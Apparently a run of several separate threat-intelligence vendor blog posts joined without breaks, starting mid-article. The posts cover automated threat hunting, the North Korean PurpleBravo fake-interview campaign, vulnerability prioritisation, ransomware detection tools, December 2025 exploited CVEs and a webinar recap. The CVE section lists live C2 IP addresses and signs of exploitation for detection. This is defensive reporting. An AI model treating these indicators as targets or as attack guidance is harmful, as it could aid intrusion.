Today, our junior analysts are running 15–20 threat hunts each week to identify high-priority threats. This isn't just about quantity; it's about empowering less experienced team members to contribute meaningfully to our defense posture while accelerating their professional development.

Gallion sees this impact firsthand. "We have newer analysts who can do more advanced hunting based on IOCs, and it does it for them automatically in the background,” he says. “We get our results, and then they can do research in the app to shore up the findings."

Second, the speed and accessibility of automated threat hunting has proven invaluable during critical moments. When Steer read about Salt Typhoon making its way into corporate networks, he didn't need to schedule a meeting, assemble a team, or wait for the next sprint cycle. In the five minutes between meetings, he was able to launch a comprehensive threat hunt across Recorded Future's entire network to identify and mitigate associated risks to our systems.

That kind of rapid response would have been impossible with manual processes—and in today's threat landscape, that speed can mean the difference between containment and catastrophe.

The advantage of a single pane of glass

Another key benefit emerged around workflow efficiency. "Having a single pane of glass makes it a lot easier for an analyst to do not just the threat hunt, but also to see the meaning behind the IOCs that they're pulling back into the app," says Gallion. "Analysts don't like to have to get into a whole bunch of different applications. If we don't have to, it speeds things up and we can add context from inside the app."

This unified approach has eliminated the context-switching and tool-juggling that had often slowed down our security team and led to missed findings.

Why the Customer Zero experience matters

Serving as Customer Zero validated what we believed Autonomous Threat Operations could deliver to every customer: consistent, repeatable threat hunting that empowers analysts of all skill levels to defend their organizations more effectively. By testing the new solution within our own security operations first, we were able to identify what works, refine the capabilities that matter most, and prove that Autonomous Threat Operations isn't just a theoretical improvement—it's a practical solution that transforms daily security operations.

Gallion sums it up this way: "Some of the aspects of Autonomous Threat Operations that'll have the biggest impact are the repeatability, the scheduling of threat hunts to happen over time, and the single pane of glass that allows analysts to research IOCs in the app without having to go into multiple tools."

We saw a need for Autonomous Threat Operations, so we built it. Being Customer Zero enabled us to test it, refine it, and ensure that it’s the best possible solution to help our customers enter the era of the autonomous SOC.

Learn more about Autonomous Threat Operations by clicking here, or start operationalizing your threat intelligence now by booking a custom demo.

Executive Summary

PurpleBravo is a North Korean state-sponsored threat group that overlaps with the “Contagious Interview” campaign first documented in November 2023. It targets software developers, especially in the software development and cryptocurrency verticals, via fake recruiter outreach, interview coding tests, and ClickFix prompts. Activity throughout 2025 has linked multiple fraudulent LinkedIn personas to PurpleBravo through malicious GitHub repositories and fictitious lure brands. The group’s tool set includes BeaverTail (a JavaScript infostealer and loader) and multi-platform remote access trojans (RATs), specifically, PyLangGhost and GolangGhost, optimized for stealing browser credentials and cryptocurrency wallet information.

Based on Recorded Future® Network Intelligence, Insikt Group identified 3,136 individual IP addresses concentrated in South Asia and North America linked to likely targets of PurpleBravo activity from August 2024 to September 2025. Twenty potential victim organizations were observed across the AI, cryptocurrency, financial services, IT services, marketing, and software development verticals in Europe, South Asia, the Middle East, and Central America. In several cases, it is likely that job-seeking candidates executed malicious code on corporate devices, creating organizational exposure beyond the individual target. Insikt Group observed PurpleBravo administering command-and-control (C2) servers via Astrill VPN and from IP ranges in China, with BeaverTail and GolangGhost C2 servers hosted across seventeen distinct providers.

Insikt Group distinguishes PurpleBravo (Contagious Interview) from PurpleDelta (North Korean IT workers) but has documented meaningful intersections. This includes a likely PurpleBravo operator displaying activity consistent with North Korean IT worker behavior, IP addresses in Russia linked to North Korean IT workers communicating with PurpleBravo C2 servers, and administration traffic from the same Astrill VPN IP address associated with PurpleDelta activity.

PurpleBravo presents an overlooked threat to the IT software supply chain. Because many targets are in the IT services and staff-augmentation industries with large public customer bases, compromises can propagate downstream to their customers. This campaign poses an acute software supply-chain risk to organizations that outsource development, particularly in regions where PurpleBravo concentrates its fictitious recruitment efforts.

Key Findings

• PurpleBravo employs a combination of fictitious personas, organizations, and websites to distribute malware to unsuspecting job seekers in the software development industry. Candidates sometimes use their corporate devices, thereby compromising their employers' security.
• PurpleBravo uses a variety of custom and open-source malware and tools in its operations, including BeaverTail, InvisibleFerret, GolangGhost, and PylangGhost.
• Using Recorded Future Network Intelligence, Insikt Group identified 3,136 individual IP addresses linked to likely targets of PurpleBravo activity and twenty potential victim organizations in the AI, cryptocurrency, financial services, IT services, marketing, and software development industries.
• Insikt Group has observed multiple points of overlap between PurpleBravo and PurpleDelta, Recorded Future’s designation for North Korean IT workers, indicating that some individuals may be active in both operations.
• PurpleBravo’s heavy targeting of the IT and software development industries in South Asia presents an overlooked and acute supply-chain risk to organizations that contract or outsource their IT services work.

Key Takeaways:

• Traditional vulnerability management tools can no longer keep up with the speed of modern exploitation—threat context is now mandatory.
• Threat and Vulnerability Management (TVM) systems unify asset discovery, vulnerability data, and real-time external threat intelligence to prioritize real risk.
• Static CVSS scores fail to reflect exploitation likelihood; intelligence-driven, dynamic risk scoring is essential in 2026.
• Organizations that integrate vulnerability intelligence and attack surface intelligence reduce remediation time and security waste, enhancing detection and remediation while reducing alert fatigue.

Why Threat and Vulnerability Management Must Evolve in 2026

Security teams currently find themselves at a crossroads. Year over year, CVE volumes continue to surge higher and higher. Exploitation is faster, more automated, and more targeted, meaning attacks are growing in volume, velocity, and sophistication alike. As a result, security teams are expected to “patch faster” with fewer resources and can no longer realistically keep up with this ever-rising tide of threats.

Thanks to these forces, security teams have found themselves in a state of affairs in which vulnerability management has become an exercise in sheer volume, not risk. Day in and day out, teams are overwhelmed by alerts that lack real-world context, making it all but impossible to assess the actual degree of risk.

Thankfully, there is a solution. Threat-informed vulnerability management (TVM) has emerged to counteract this trend, enabling security teams to intelligently address weaponized vulnerabilities, zero-day exploits, and supply chain and cloud-native risk. All this comes along with much-needed relief from creeping alert-fatigue.

In 2026, effective cybersecurity programs will be defined not by how many vulnerabilities they detect but by how precisely they understand, prioritize, and neutralize real threats using intelligence-driven TVM systems.

The Core Problem: Alert Fatigue and Prioritization Failure

As it stands today, the explosion in disclosed vulnerabilities (CVEs) has outpaced humans’ abilities to triage and manage patching effectively. Today, the vast majority of organizations are incapable of remediating more than a fraction of the total identified issues affecting the ecosystem.

Traditionally, using a standard CVSS (Common Vulnerability Scoring System) was enough to overcome these challenges of prioritization. CVSS is an open, standardized framework used to assess the severity of security vulnerabilities by assigning a numerical score based on factors like exploitability, impact, and scope. Organizations use CVSS scores to prioritize remediation and compare vulnerabilities consistently across systems and vendors.

However, CVSS only measures theoretical severity, not exploitation likelihood. It misses critical pieces of context for prioritization decisions such as:

• Is exploit code available?
• Is the vulnerability actively exploited?
• Are threat actors discussing or operationalizing it?

As a result, high-severity CVEs that pose little real-world risk continue to consume time and resources, leading us back once again to the issue of alert fatigue and the inability to effectively triage and patch the most pressing vulnerabilities.

At the same time, we are seeing modern organizations struggle with a “silo problem,” in which security, IT, and CTI (cyber threat intelligence) teams operate independently and with limited visibility and collaboration between one another. In many organizations, each of these teams ends up using different tools, establishing different priorities, sharing findings infrequently if at all, and adopting entirely different “risk languages” through which they understand, prioritize, and address threats.

Taken broadly, this leaves organizations woefully lacking a unified, intelligence-driven view of risk. Without this, many adopt a de facto policy of “patch everything”. And it comes with significant costs, including:

• Operational drag and burnout
• Delayed remediation of truly dangerous vulnerabilities
• Increased business risk despite increased effort
• Fractured security operations

Both individually, and in the aggregate, these side-effects come at a significant detriment to organizational security. And as the number and diversity of CVEs continues to expand, the greater that cost becomes. Moving forward, organizations must find a better way.

The Evolving Threat Landscape Demands a New Approach

Today’s ever-changing landscape means that organizations must evolve along with it or risk falling dangerously behind. The rise of rapidly weaponized vulnerabilities (i.e., known software weaknesses that have moved beyond disclosure and into active attacker use) reflects a fundamental shift in how quickly and deliberately adversaries turn CVEs into operational threats. Today, the gap between disclosure, proof-of-concept release, and active exploitation has collapsed from months to days (or even hours), driven largely by exploit marketplaces, automated scanning, and widely shared tooling.

Attackers increasingly prioritize vulnerabilities that are easy to exploit, broadly applicable across cloud services, edge devices, and common dependencies, and capable of delivering fast returns. Once weaponized, these vulnerabilities manifest not as theoretical risk but as active intrusion campaigns, ransomware operations, and opportunistic internet-wide exploitation, making threat context essential for distinguishing true danger from background noise.

At the same time that weaponization is accelerating, attack surfaces are expanding. The average attack surface today is expanding and fragmenting across hybrid and multi-cloud environments, all of which is worsened by SaaS sprawl, shadow IT, and third-party and supply chain exposure. In this environment, it is absolutely critical that security teams have a clear understanding of vulnerabilities vs. threats, and work to establish an integrated approach between the two.

In short, a vulnerability is a technical weakness, while a threat is an actor, campaign or event at work exploiting that weakness. In order to be truly effective, modern threat vulnerability management (TVM) systems must merge both concepts to reflect real risk and separate signal from noise.

What Is Threat and Vulnerability Management (TVM)?

Threat and Vulnerability Management (TVM) — also called Threat-Informed Vulnerability Management — is a continuous, intelligence-driven process that prioritizes remediation based on three core variables:

• Active exploitation
• Threat actor behavior
• Asset criticality

TVM differs from traditional vulnerability management (VM) in a number of critical ways. Traditional VM relies on periodic scans, static severity scoring, and a largely reactive patching process. TVM, on the other hand, employs continuous monitoring, external threat intelligence enrichment, and close-loop remediation and validation.

This continuous, context-rich approach is foundational for modern security programs. Rather than inundating security teams with decontextualized CVEs and indiscriminate patching, modern TVM systems align security efforts with attacker reality. Reactive patching is replaced with proactive, risk-based decision-making, and as a result, organizations are able to reduce noise while simultaneously increasing the impact of their security operations.

The Five Core Pillars of Modern TVM Systems

As the speed and breadth of today’s threats continue to grow, traditional VM, being fundamentally reactive in nature, is no longer enough to keep up. In a world where vulnerabilities are exposed by the day, TVM offers much-needed efficiency, intelligence, and proactiveness. However, not all TVM systems are created equally. Here are five core pillars of effective modern TVM systems to help you evaluate and assess solutions on the market.

1. Continuous Asset Discovery & Inventory

Modern TVM systems are invaluable in that they provide full visibility across the entirety of an organization’s growing and fragmented attack surface. This includes external-facing assets, shadow IT, and cloud and SaaS environments alike. By providing continuous asset discovery and a timely, up-to-date inventory of one’s assets, TVM systems allow for real-time, comprehensive, attack-surface management.

Remember, you can’t defend what you can’t see. That’s why attack surface management (ASM) is a prerequisite for effective TVM. Without accurate, up-to-date asset inventories, vulnerability data is incomplete and misleading. Continuous discovery ensures defenders see their environment the way attackers do.

2. Vulnerability Assessment & Scoring

TVM goes beyond internal scanning tools to identify vulnerabilities exposed to the internet and reassess them continuously as environments change. This includes tracking misconfigurations, outdated services, and newly introduced exposure, not just known CVEs.

3. External Threat Context Enrichment

This is where TVM fundamentally diverges from legacy approaches. External threat intelligence enriches vulnerability data with insight from dark web and criminal forums, exploit marketplaces, malware telemetry, and active attack campaigns.

Vulnerabilities are mapped to known threat actors, active exploitation, and MITRE ATT&CK® techniques, ultimately transforming raw findings into actionable intelligence.

4. Risk-Based Prioritization (RBVM)

Risk-based vulnerability management prioritizes issues based on the probability of exploitation, asset importance, and threat actor interest. This shifts the focus from “most severe” to “most dangerous,” enabling teams to address the vulnerabilities that pose the greatest immediate risk to their organizations.

5. Automated Remediation & Verification

Modern TVM integrates directly with IT and SecOps workflows, pushing prioritized findings into ticketing and automation platforms. Just as importantly, it verifies remediation to confirm that patches were applied and exposure was actually reduced, creating a continuous feedback loop.

These five pillars of effective TVM systems come together to create a whole that is greater than the sum of its parts. These systems, unlike their predecessors, are designed to continuously monitor and triage real threats and vulnerabilities in context and ensure awareness and proactive mitigation without the risk of burn-out and alert fatigue.

Stop Patching Everything — Use Intelligence to Prioritize Real Risk

The scale of the CVE problem is overwhelming. Tens of thousands of vulnerabilities are disclosed each year, yet only a small fraction are ever exploited in the wild. Treating them all as equally urgent is not just inefficient — it’s dangerous.

Vulnerability intelligence changes the equation by tracking a CVE across its full lifecycle, from initial disclosure to weaponization, exploitation, and criminal adoption. This enables dynamic risk scoring that reflects real-world conditions rather than static assumptions.

Dynamic risk scoring incorporates evidence of active exploitation, availability of exploit code, dark web chatter, and threat actor interest. As conditions change, so does the risk score, ensuring prioritization remains aligned with attacker behavior.

The operational impact is significant. Security teams can focus remediation on the top 1% of vulnerabilities that pose immediate risk, respond faster, reduce operational cost, and strengthen overall security posture.

See Your Risk Like an Attacker: The Full Attack Surface View

In today’s threat landscape, security teams must recast the way they envision their roles. Rather than operating in a reactive, defensive manner at all times, security teams should think more like their adversaries, taking a complete view of their attack surface and leveraging modern tools and technologies to ensure intelligent, prioritized defenses. The following three key concepts will help you take on that mentality.

1. The Visibility Gap: Unknown assets create unknown risk. Traditional scanners often miss orphaned domains, misconfigured cloud services, and forgotten infrastructure — precisely the assets attackers look for first.
2. Attack Surface Intelligence Explained: Attack surface intelligence provides continuous mapping of domains, IPs, cloud assets, and external services. It identifies exposures attackers see before defenders do, enabling proactive remediation rather than reactive cleanup.
3. Connecting the Dots with Vulnerability Tools: When integrated with vulnerability scanners like Qualys and Tenable, attack surface intelligence provides a unified, prioritized view of exposure. Intelligence-driven platforms serve as a single source of truth for risk decisions, enabling teams to connect vulnerabilities to real-world exposure and threat activity.

Three Strategic Recommendations for Security Leaders

Most organizations remain behind the curve in threat and vulnerability management. Knowing what we know now, there are three strategic steps security leaders can take to reclaim control.

1. Bridge the Gap Between Security and IT

Establish a shared, intelligence-driven risk language. Align SLAs with real-world risk rather than raw severity scores, ensuring remediation efforts focus on what matters most.

2. Embrace Automation and Workflow Integration

Push prioritized findings directly into platforms like ServiceNow and SOAR tools. Reducing manual handoffs accelerates remediation and minimizes delays.

3. Measure What Matters — Time-to-Remediate (TTR)

Shift KPIs toward time-to-remediate actively exploited vulnerabilities and reduction in exposure windows. These metrics demonstrate real ROI and security impact.

The Path Forward Is Threat-Informed: Strengthen Your Threat and Vulnerability Strategy

Volume-based vulnerability management is no longer viable. As we progress through 2026, threat context is not optional. It is foundational.

Future-ready security programs are intelligence-led, automation-enabled, and attacker-aware. Recorded Future sits at the center of this shift, providing the intelligence backbone required to move from reactive patching to proactive risk reduction.

Explore how Recorded Future Vulnerability Intelligence and Attack Surface Intelligence can help your organization transition from alert-driven vulnerability management to intelligence-driven risk reduction.

By unifying threat intelligence, vulnerability data, and attack surface visibility, organizations can reduce alert fatigue, prioritize what truly matters, and proactively harden defenses against real-world threats before attackers exploit them.

Key Takeaways

• Effective ransomware detection requires three complementary layers: endpoint and extended detection and response (EDR/XDR) to monitor device-level activity, network detection and response (NDR) to catch lateral movement, and threat intelligence tools to provide context that enables efficient prioritization.
• The most valuable detection happens before ransomware encryption begins. Tools must identify precursor behaviors like reconnaissance, credential theft, and data staging rather than waiting for known indicators of compromise.
• Intelligence quality determines detection quality: even sophisticated security tools require real-time threat data about active ransomware campaigns, attacker infrastructure, and current tactics, techniques, and procedures (TTPs) to distinguish genuine threats from noise.
• Recorded Future strengthens the entire detection stack by providing organization-specific threat intelligence, early detection capabilities (in some cases, identifying victims up to 30 days before public extortion), and vulnerability intelligence focused on what ransomware groups are actively exploiting.

Introduction

The ransomware playbook has fundamentally changed. Instead of casting wide nets with opportunistic phishing campaigns, attackers now focus on big-game hunting: targeting high-value enterprises with data theft and double or triple extortion tactics. Threat actors purchase pre-compromised access from brokers, exploit newly disclosed vulnerabilities within hours, and use automation to compress weeks-long campaigns into days.

The results are stark. Ransomware now appears in 44% of breaches, up from 32% the prior year, according to the 2025 Verizon Data Breach Investigations Report. Traditional signature-based detection tools often can't keep pace because ransomware groups continuously rotate their infrastructure, modify malware variants, and adopt new tactics faster than defenses can update. By the time a signature is written, the threat has already evolved.

This gap has created demand for a different approach: intelligence-driven ransomware detection. Rather than waiting for known indicators of compromise, these tools identify the precursor behaviors that happen before encryption (e.g. reconnaissance, credential theft, lateral movement, privilege escalation, and data staging).

The key is continuous external intelligence that maps what's happening in your environment to active campaigns and specific ransomware families operating in the wild.

The most effective defense combines three layers: endpoint and extended detection and response (EDR/XDR) to catch suspicious behaviors on devices, network detection and response (NDR) with deception technology to spot lateral movement, and threat intelligence tools that provide the real-time context tying it all together. When these tools share a common intelligence foundation, they can reveal malicious intent well before encryption begins.

The Ransomware Detection Tool Landscape: Three Pillars of Defense

Effective ransomware detection generally requires three complementary tool categories, each targeting different stages of an attack.

1. Endpoint and Extended Detection and Response (EDR/XDR) Tools

EDR and XDR platforms form the first line of defense, monitoring individual devices and user activity for signs of compromise.

Core Functionality

EDR and XDR solutions monitor endpoints for suspicious behaviors like privilege escalation, credential dumping, unusual process creation, and bulk file modifications. When they detect threats, these tools automatically isolate devices, roll back changes, and contain threats, cutting response time from hours to seconds.

How Threat Intelligence Enhances EDR/XDR

Threat intelligence connects endpoint activity to active campaigns in the wild. When an EDR tool flags suspicious activity, intelligence context reveals whether it matches known campaigns from groups like LockBit, ALPHV/BlackCat, or BlackBasta. This can dramatically reduce false positives by distinguishing unusual-but-legitimate administrative work from activity aligned with active ransomware operations.

Example Tools

• CrowdStrike Falcon delivers strong behavioral detection capabilities tied to comprehensive actor profiling. The platform's threat graph continuously correlates endpoint telemetry with global threat intelligence, enabling rapid identification of ransomware precursors.
• Microsoft Defender XDR integrates telemetry across identity systems, endpoints, email, and cloud applications. This unified visibility helps security teams identify cross-domain attack patterns that indicate ransomware preparation, such as credential theft followed by lateral movement.
• SentinelOne employs behavioral AI to detect malicious activity and offers automated rollback features that can reverse ransomware encryption and file modifications, effectively restoring systems to their pre-attack state.

2. Network Detection and Response (NDR) Tools

While EDR focuses on individual endpoints, NDR tools monitor the network layer to catch attackers as they move between systems.

Core Functionality

NDR platforms watch internal network traffic to catch attackers moving laterally, scanning for targets, or accessing resources they shouldn't. The more advanced versions include deception technology like honeypots, fake credentials, and decoy systems that look like attractive targets. When attackers interact with these decoys during reconnaissance, security teams get early warnings before any real damage occurs.

How Threat Intelligence Improves NDR and Deception

Threat intelligence helps organizations customize deception environments based on active ransomware groups in their industry. When NDR tools spot anomalies such as unusual file sharing, unexpected queries, or abnormal transfers, intelligence matches these to current attack techniques, distinguishing administrative work from reconnaissance patterns before data staging begins.

Example Tools

• Vectra AI specializes in detecting lateral movement and privilege misuse by correlating network behaviors with active attacker tradecraft. The platform's AI-driven detection identifies subtle deviations from normal network patterns that indicate ransomware reconnaissance.
• ExtraHop Reveal(x) provides real-time network visibility that identifies reconnaissance activity and command-and-control (C2) communications. The platform's deep packet inspection capabilities reveal malicious traffic even when encrypted or obfuscated.
• Illusive (now part of Zscaler) deploys deception technology specifically tuned to adversary behaviors. The platform's decoys and fake credentials create a minefield for attackers, triggering high-confidence alerts when threat actors interact with deception assets.

3. Threat Intelligence Tools

The third pillar provides the context that makes endpoint and network detection tools more accurate and actionable.

Core Functionality

Threat intelligence tools pull together global threat data from sources like dark web forums, malware repositories, scanning activity, and criminal infrastructure. They enrich alerts from your other security tools with context about who's behind an attack, which campaign it's part of, and what techniques the attackers are likely to use next.

How Threat Intelligence Strengthens Ransomware Detection

These tools deliver several critical capabilities that transform how security teams identify and respond to ransomware threats:

• Threat Mapping: Identifies whether your organization matches the targeting profile of active ransomware groups based on your industry, size, region, and technology stack. Specific operators are mapped using their TTPs to determine the intent and opportunity of carrying out a successful attack against your business.
• Infrastructure Tracking: Monitors ransomware operators' continuous infrastructure shifts in real-time, identifying new C2 servers, drop sites, and payment infrastructure as they emerge.
• Variant Identification: Rapidly analyzes and disseminates indicators when ransomware groups release new malware variants, enabling detection before signature-based systems receive updates.
• Exploitation Intelligence: Identifies specific CVEs and misconfigurations that attackers are actively weaponizing, moving vulnerability management from severity-score-driven to threat-driven prioritization.
• Risk Scoring: Provides real-time scores combining multiple intelligence signals—indicator prevalence, campaign association, TTP alignment—to guide analysts toward genuine threats rather than generic suspicious activity.

Example Tools

• Recorded Future delivers organization-specific threat intelligence powered by The Intelligence Graph and proprietary AI. The platform provides end-to-end visibility into exposures, while research from its Insikt Group enables early detection of ransomware activity, identifying potential victims up to 30 days before public extortion.
• Flashpoint specializes in deep and dark web intelligence, monitoring criminal forums, marketplaces, and chat channels where ransomware operators communicate, recruit, and trade access. This visibility into adversary communities provides early warnings about emerging threats and campaigns.
• Google Threat Intelligence (formerly Mandiant) combines frontline incident response insights with global threat tracking. The platform leverages intelligence from breach investigations to identify ransomware group behaviors and attack patterns as they emerge.

Choosing the Right Ransomware Detection Tools

Security leaders must distinguish between tools that reduce ransomware risk and those that add noise. The most effective tools share several characteristics.

Security leaders should prioritize:

• Pre-encryption visibility: Detect credential misuse, suspicious access, and lateral movement during reconnaissance and preparation phases when interventions are most effective.
• Context-rich alerts: Alerts should include TTPs, infrastructure associations, and known actor activity and explain not just what triggered an alert but why it matters.
• Integration maturity: Smooth data flow into SIEM, SOAR, and existing investigation workflows without creating siloed intelligence or blind spots.
• Operational efficiency: Tools should reduce alert noise, not add to it, decreasing time-to-detection and time-to-response.
• Relevance: Intelligence must map to current campaigns. Generic or stale indicators waste analyst time and create false confidence.
• Scalability: Handle hybrid environments spanning on-premises infrastructure, multiple cloud providers, and remote endpoints without performance degradation.

How Recorded Future Enables Early Ransomware Detection

The quality of threat intelligence directly determines detection effectiveness. Even sophisticated endpoint and network tools require high-fidelity, current threat data to generate value. Security teams have plenty of options for tools; the real challenge is addressing alert fatigue draining analyst time on false positives instead of credible threats.

Recorded Future functions as the continuous intelligence layer strengthening the entire detection stack. Rather than adding another alert-generating tool, it feeds existing security ecosystems with real-time context about ransomware operator behavior.

Real-Time Relevance Through SecOps Intelligence

Every alert that hits your SIEM or endpoint platform gets automatically enriched with real-time risk scores, associated malware and infrastructure, and links to known attacker techniques and campaigns. Security tools can immediately recognize whether an indicator matches an active ransomware operation, cutting triage time from hours to minutes.

Proactive Mitigation Through Vulnerability Intelligence

Recorded Future identifies which vulnerabilities ransomware groups are actually exploiting right now, not just which ones have the highest theoretical severity ratings. This distinction matters because most high-severity vulnerabilities never get exploited in the wild, while some medium-severity vulnerabilities become critical the moment ransomware operators weaponize them.

The platform shows you which vulnerabilities specific ransomware groups are targeting, where exploit code is available, and which vulnerabilities are generating buzz in criminal forums. This lets security teams prioritize patching based on what attackers are actually doing, focusing on the access vectors most likely to result in ransomware incidents.

Victimology and Anticipation

Intelligence about dark web chatter, leak site activity, and victimology patterns reveals which industries, geographies, and technologies are being targeted. When Recorded Future detects increased targeting of specific sectors, SOC analysts can anticipate attack paths, tighten access controls, and implement protective measures before campaigns reach their network.

This closes the gap between reconnaissance and encryption. Most traditional tools don't trigger alerts until ransomware starts encrypting systems, by which point attackers have already stolen data. Intelligence-driven detection can catch the reconnaissance, credential theft, and lateral movement phases that happen first, shifting your response window from reactive damage control to proactive early containment.

Shifting From Reactive Response to Intelligence-Led Prevention

No single tool stops ransomware. The strongest defense is an integrated ecosystem where endpoint detection, network monitoring, and threat analysis platforms work from the same intelligence foundation.

Intelligence elevates these tools from reactive detection to early recognition of adversary behavior during preparation and reconnaissance phases, enabling intervention before ransomware reaches its destructive phase. Organizations that build detection architecture on real-time threat intelligence will adapt as quickly as their adversaries, maintaining effective defenses as the threat landscape evolves.

December 2025 witnessed a dramatic 120% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 22 vulnerabilities requiring immediate remediation, up from 10 in November. The month was dominated by widespread exploitation of Meta's React Server Components flaw.

What security teams need to know:

• React2Shell pandemonium: CVE-2025-55182 triggered a global exploitation wave with multiple threat actors deploying diverse malware families
• China-nexus exploitation intensifies: Earth Lamia, Jackpot Panda, and UAT-9686 leveraged critical flaws for espionage operations
• Public exploits proliferate: Eleven of 22 vulnerabilities have proof-of-concept code available, accelerating exploitation timelines
• Legacy vulnerabilities resurface: CISA added 2018-2022 era flaws to its Known Exploited Vulnerabilities (KEV) catalog, highlighting persistent patch gaps

Bottom line: December's surge reflects both new zero-days and renewed interest in legacy vulnerabilities. React2Shell alone demonstrates how quickly modern web frameworks can become global attack vectors.

Quick Reference Table

All 22 vulnerabilities below were actively exploited in December 2025.

Table 1: List of vulnerabilities that were actively exploited in December based on Recorded Future data (Source: Recorded Future)

Key Trends in December 2025

Affected Vendors

• Fortinet continued vulnerability concerns with two critical authentication bypass flaws
• Google faced three vulnerabilities across Android (2) and Chromium (1) platforms
• Microsoft dealt with a Windows kernel use-after-free vulnerability
• Meta experienced the month's most impactful vulnerability with React2Shell
• Additional affected vendors: Array Networks, Gogs, Gladinet, ASUS, Cisco, Apple, SonicWall, WatchGuard, MongoDB, Digiever, Sierra Wireless, OSGeo, RARLAB, D-Link, and OpenPLC

Most Common Weakness Types

• CWE-22 – Path Traversal
• CWE-347 – Improper Verification of Cryptographic Signature
• CWE-416 – Use After Free
• CWE-434 – Unrestricted Upload of File with Dangerous Type
• CWE-787 – Out-of-bounds Write

Threat Actor Activity

React2Shell exploitation dominated December’s CVE activity:

• Threat actors observed to have exploited this vulnerability:
  • China-nexus actors Earth Lamia and Jackpot Panda
  • China-linked clusters UNC6600, UNC6586, UNC6588, UNC6603, and UNC6595
  • North Korea-linked and financially motivated groups
• Observed payloads included EtherRAT, PeerBlight, CowTunnel, ZinFoq, Kaiji variants, Zndoor, RondoDox, MINOCAT, SNOWLIGHT, COMPOOD, HISONIC, ANGRYREBEL.LINUX, and Weaxor ransomware (using a Cobalt Strike stager)
• Infrastructure connections to HiddenOrbit relay infrastructure and GobRAT relay component

Additional activity:

• UAT-9686 exploited Cisco Secure Email Gateway (CVE-2025-20393), deploying AquaShell, AquaPurge, and AquaTunnel
• Unknown actors leveraged Gogs vulnerability (CVE-2025-8110) for Supershell malware deployment

Priority Alert: Active Exploitation

These vulnerabilities demand immediate attention due to confirmed widespread exploitation.

CVE-2025-55182 | Meta React Server Components (React2Shell)

Risk Score: 99 (Very Critical) | CISA KEV: Added December 5, 2025

Why this matters: Unauthenticated RCE affects React and Next.js, among the world's most popular web frameworks. Multiple threat actors are actively exploiting vulnerable instances with diverse malware payloads.

Affected versions:

• React packages: react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack (19.0.0, 19.1.0, 19.1.1, and 19.2.0)
• Next.js: 15.x, 16.x, and Canary builds from 14.3.0-canary.77
• Also affects: React Router, Waku, RedwoodSDK, Parcel, Vite RSC plugin

Immediate actions:

• Upgrade React to 19.0.3, 19.1.4, or 19.2.3 immediately
• Update Next.js to 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, or 15.0.5
• Monitor for unusual multipart/form-data POST requests consistent with Next.js Server Actions / RSC endpoints
• Check logs for E{"digest" error patterns indicating exploitation attempts
• Review server processes for unexpected Node.js child processes

Exposure: ~310,500 Next.js instances on Shodan (US, India, Germany, Japan, Australia)

Figure 1: Vulnerability Intelligence Card® for CVE-2025-55182 (React2Shell) in Recorded Future (Source: Recorded Future)

CVE-2025-20393 | Cisco Secure Email Gateway

Risk Score: 99 (Very Critical) | Active exploitation by UAT-9686

Why this matters: Chinese threat actors are actively compromising email security infrastructure to establish persistent access and pivot into internal networks.

Affected products: Cisco Secure Email Gateway and Secure Email and Web Manager running AsyncOS

Immediate actions:

• Apply Cisco's security updates immediately
• Monitor Spam Quarantine web interface access logs
• Check for modifications to /data/web/euq_webui/htdocs/index.py
• Hunt for AquaShell, AquaPurge, and AquaTunnel indicators
• Review outbound connections to suspicious IPs

Known C2 infrastructure: 172.233.67.176, 172.237.29.147, 38.54.56.95 (inactive)

Key Takeaways

• Intelligence drives better decisions. High-performing teams use threat intelligence not just for detection, but to inform strategic business decisions and communicate risk to leadership.
• Maturity means efficiency. Advanced programs focus on automation, high-fidelity indicators, and cross-functional collaboration—freeing analysts to concentrate on strategic initiatives.
• Information overload is the top challenge. Teams need better integrations and AI-powered tools to transform massive data volumes into actionable insights.
• AI will reshape the analyst role. While junior analysts won't be replaced, their workflows will evolve significantly as AI augments their capabilities.

Recorded Future recently hosted two webinars to unpack key insights from the 2025 State of Threat Intelligence Report and hear directly from customers who are putting these findings into practice.

Based on survey responses from 615 cybersecurity executives and practitioners, the report showed clear industry trends. Threat intelligence spending is up, with 76% of organizations spending over $250,000 annually and 91% planning to increase spending in 2026. Even more critically, 87% said they expect to advance the maturity of their threat intelligence programs over the next two years.

But what does maturity actually look like in practice? Our customers offered candid perspectives on how they're turning intelligence into impact.

Intelligence as a strategic asset

Our webinar panelists noted that the availability of rich threat intelligence has transformed how their organizations approach decision-making. According to Jack Watson, Senior Threat Intelligence Analyst at Global Payments, “Understanding that one alert opened and one alert closed does not necessarily equate to one single adversary being stopped” has led his team to take “a much more holistic approach to looking at problems.”

Omkar Nimbalkar, Senior Manager of Cyber Threat Research and Intelligence at Adobe, said, “Once you start doing this work day in and day out, you uncover patterns in your environment. You uncover what your posture looks like, where your true risk resides, and you can use that as a means to inform the business on the changing threat landscape for better decision-making.”

Ryan Boyero, Recorded Future’s Senior Customer Success Manager, said context and storytelling are key benefits of threat intelligence. “You can have a precursor or malicious activity that has occurred,” he said, “but without threat intelligence, you can’t really tell the story or paint the picture to deliver to senior leadership in order to help make the best and informed decisions possible.”

How threat intelligence delivers organization-wide value

Nimbalkar said his team provides tailored threat intelligence to business units and product teams across Adobe so they can monitor for specific behavioral activities and block specific threats in their environments.

Boyero shared that Recorded Future customers in EMEA use threat intelligence to educate leadership. “We're able to inform leaders,” he said. “We're able to speak with executives, get them in the room, not so much scare them that a situation could happen or has happened, but ultimately just educate and let them know that this is what Recorded Future is able to do and how we can bring success to the table.”

Erich Harbowy, Security Intelligence Engineer at Superhuman, said that in addition to educating leaders about risk, his team also uses threat intelligence to show the value of their work. “Not only am I using this very current news, I am also using the statistics that come along with that,” he said. “How much damage occurred during the first attack that was similar to this? And are [my adversaries] done? Are they coming back?”

Harbowy appreciates Recorded Future for providing those insights for postmortems and follow-ups with executives. “How do I prove my worth?” he said. “Give me the intel.”

The anatomy of a mature threat intelligence program

According to Nimbalkar, maturity comes when the foundational tactical and operational work is complete. He said that advancing a threat intelligence program is all about efficiency and optimization, including making sure you have high-fidelity indicators so your noise-to-signal ratio is reduced and you have higher-quality detections, understanding who your adversaries are and how they’re targeting you, getting in front of stakeholders and engaging with cross-functional teams, and collecting metrics on everything you do.

“Once you have figured out all these workflows, automated as much as you can, optimized and made it efficient, and then you focus more on risk reduction across the environment and more on strategic initiatives, that’s a very good maturation,” he said.

